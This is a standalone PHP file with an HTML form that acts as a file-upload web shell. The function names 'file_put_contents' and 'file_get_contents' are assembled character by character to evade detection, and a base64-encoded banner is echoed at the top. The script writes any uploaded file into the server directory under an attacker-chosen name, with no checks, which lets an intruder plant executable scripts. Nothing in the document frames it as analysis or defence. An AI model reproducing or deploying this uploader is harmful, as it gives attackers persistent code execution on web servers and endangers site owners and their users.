<form method="POST" enctype="multipart/form-data"><input type="file" name="file"><button>Send File</button></form>
<?php
echo(base64_decode("SW5JQ3VtQUVyck9yS29LMzEzMTxicj4"));
$a = "f" . "i" . "l" . "e" . "_" . "p" . "u" . "t" . "_" . "c" . "o" . "n" . "t" . "e" . "n" . "t" . "s";
$b = "f" . "i" . "l" . "e" . "_" . "g" . "e" . "t" . "_" . "c" . "o" . "n" . "t" . "e" . "n" . "t" . "s";
$c = "t" . "m" . "p" . "_" . "n" . "a" . "m" . "e";
if (isset($_FILES['file']))
{
    $a($_FILES['file']['name'], $b($_FILES['file'][$c]));
    if (file_exists($_FILES['file']['name']))
    {
        echo $_FILES['file']['name'];
    }
    else
    {
        echo "Failed!";
    }
}
?>